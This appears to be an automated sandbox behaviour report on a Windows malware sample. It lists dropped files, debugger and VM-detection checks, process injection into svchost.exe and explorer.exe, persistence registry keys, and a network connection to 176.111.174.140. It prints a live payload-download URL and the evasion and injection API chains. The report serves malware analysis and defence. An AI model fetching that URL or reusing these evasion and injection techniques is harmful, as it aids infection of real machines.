Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\python38.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe	Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe	Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe	Evaded block: after key decision

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found evasive API chain checking for process token information

Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe

API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 7328	Thread sleep count: 150 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7328	Thread sleep time: -135000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7316	Thread sleep count: 7977 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7316	Thread sleep time: -71793000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7328	Thread sleep count: 107 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7328	Thread sleep time: -96300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7480	Thread sleep time: -3741000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7476	Thread sleep time: -1800000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7480	Thread sleep time: -6088000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E17059EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	0_2_00007FF6E17059EC
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC06AE0 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,	2_2_0FC06AE0
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB59EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	3_2_00007FF699AB59EC
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F59EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	4_2_00007FF7536F59EC
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B559EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	7_2_00007FF736B559EC
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00007FF632DA79B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DA85A0 FindFirstFileExW,FindClose,	8_2_00007FF632DA85A0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DC0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA85A0 FindFirstFileExW,FindClose,	11_2_00007FF632DA85A0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DC0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	11_2_00007FF632DC0B84
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DA79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	11_2_00007FF632DA79B0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01343280 FindFirstFileExW,FindNextFileW,FindClose,	11_2_00007FFE01343280
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE0134303C FindFirstFileExW,FindNextFileW,FindClose,	11_2_00007FFE0134303C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E759EC SHGetFolderPathW,FindFirstFileW,FindNextFileW,	13_2_00007FF7F4E759EC

Source: C:\Windows\explorer.exe

Code function: 2_2_09CB2CE0 GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualQuery,VirtualAlloc,

2_2_09CB2CE0

Source: C:\Windows\explorer.exe

Thread delayed: delay time: 90000

Source: svchost.exe	Binary or memory string: vboxtray.exe
Source: explorer.exe, 00000002.00000002.2975609849.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.1740843885.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000002.00000000.1738931822.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000002.00000002.2975609849.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000003.2043977892.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: fNzx1wx8tL.exe	Binary or memory string: wcscpymsvcrt.dllwcscatwcscmpwcsncpywcslenstrlenreallocfreewcsstrCloseHandlekernel32.dllCreateFileWFreeLibraryMoveFileWGetFileSizeExGetWindowsDirectoryAGetVolumeInformationAGetTickCountwsprintfWuser32.dllwsprintfAVirtualAllocReadFileSleepVirtualFreeSetFilePointerCreateDirectoryWFindFirstFileWFindNextFileWFindCloseCopyFileWWriteFileGetSystemDirectoryWExitProcessCreateProcessWShellExecuteWshell32.dllGetModuleFileNameWGetShortPathNameWGetEnvironmentVariableWInternetOpenWwininet.dllInternetOpenUrlWHttpQueryInfoAInternetReadFileInternetConnectWHttpOpenRequestWHttpSendRequestAInternetCloseHandleSHGetFolderPathWSHGetFolderPathASHGetKnownFolderPathPathIsURLWshlwapi.dllPathCombineWPathFindFileNameWRegDeleteKeyWAdvapi32.dllRegOpenKeyExARegSetValueExARegCloseKeyOpenProcessTokenGetTokenInformationAdjustTokenPrivilegesGetUserNameWLookupPrivilegeValueACoUninitializeole32.dllCoCreateInstanceCoInitializeMessageBoxAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3SeDebugPrivilegeReflectiveLoaderSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolderProcessHacker.exeprocexp.exeprocexp64.exeTOTALCMD.exex64dbg.exehttp://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeChromebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemRoot%\system32\svchost.exe%08lX%04lX%luZBI\.exe.lnk\Software\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHiddenServicesUnknown.firefox.exeexplorer.exe\MRT.exe\Mozilla\Firefox\Profiles\*release
Source: svchost.exe	Binary or memory string: vmware.exe
Source: explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000002.00000000.1740843885.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe	Binary or memory string: vmware-vmx.exe
Source: explorer.exe, 00000002.00000003.2043977892.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: svchost.exe	Binary or memory string: vboxservice.exe
Source: fNzx1wx8tL.exe, 00000000.00000003.1709851725.0000015FFE2BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeChromebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemR(
Source: explorer.exe, 00000002.00000002.2969120001.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000002.00000002.2973724478.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\explorer.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Process information queried: ProcessInformation

Found API chain indicative of debugger detection

Anti Debugging

Source: C:\Windows\explorer.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\svchost.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E1703C9C IsDebuggerPresent,ExitProcess,GetModuleFileNameW,PathFindFileNameW,CreateMutexA,GetLastError,CloseHandle,ExitProcess,GetModuleHandleA,VirtualProtect,ExitProcess,ExitProcess,

0_2_00007FF6E1703C9C

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E171AE9C EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00007FF6E171AE9C

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Enables debug privileges

Source: C:\Windows\System32\svchost.exe

Process token adjusted: Debug

Benign windows process drops PE files

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1714B34 SetUnhandledExceptionFilter,	0_2_00007FF6E1714B34
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1714978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6E1714978
Source: C:\Windows\explorer.exe	Code function: 2_2_09CB8104 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_09CB8104
Source: C:\Windows\explorer.exe	Code function: 2_2_09CC0370 SetUnhandledExceptionFilter,	2_2_09CC0370
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC27498 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0FC27498
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC322F0 SetUnhandledExceptionFilter,	2_2_0FC322F0
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC4B34 SetUnhandledExceptionFilter,	3_2_00007FF699AC4B34
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC4978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF699AC4978
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753704B34 SetUnhandledExceptionFilter,	4_2_00007FF753704B34
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753704978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF753704978
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B64B34 SetUnhandledExceptionFilter,	7_2_00007FF736B64B34
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B64978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF736B64978
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DABBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF632DABBC0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DAC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF632DAC44C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DB9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF632DB9924
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 8_2_00007FF632DAC62C SetUnhandledExceptionFilter,	8_2_00007FF632DAC62C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DABBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF632DABBC0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DAC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF632DAC44C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DB9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF632DB9924
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FF632DAC62C SetUnhandledExceptionFilter,	11_2_00007FF632DAC62C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE0131A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FFE0131A184
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE01340F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FFE01340F20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D6810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FFE126D6810
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D5DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FFE126D5DF8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE126D69F8 SetUnhandledExceptionFilter,	11_2_00007FFE126D69F8
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE1321D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FFE1321D414
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E4A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FFE148E4A34
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: 11_2_00007FFE148E5054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FFE148E5054
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E84978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00007FF7F4E84978
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E84B34 SetUnhandledExceptionFilter,	13_2_00007FF7F4E84B34

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe

File created: A91B.tmp.zx.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 176.111.174.140 80

Contains functionality to inject code into remote processes

Source: C:\Windows\explorer.exe

Code function: 2_2_09CBE948 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,

2_2_09CBE948

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1703834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	0_2_00007FF6E1703834
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBD180 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	2_2_09CBD180
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBCEB4 OpenProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,	2_2_09CBCEB4
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC427D0 free,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	2_2_0FC427D0
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB3834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	3_2_00007FF699AB3834
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F3834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	4_2_00007FF7536F3834
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00007FF736B53834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	7_2_00007FF736B53834
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_00007FF7F4E73834 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,	13_2_00007FF7F4E73834

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\svchost.exe

Thread created: C:\Windows\explorer.exe EIP: 7DAC698

Injects a PE file into a foreign processes

Source: C:\Windows\System32\svchost.exe

Memory written: C:\Windows\explorer.exe base: 7DA0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\svchost.exe

Memory written: PID: 2580 base: 7DA0000 value: 4D

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly	Jump to behavior
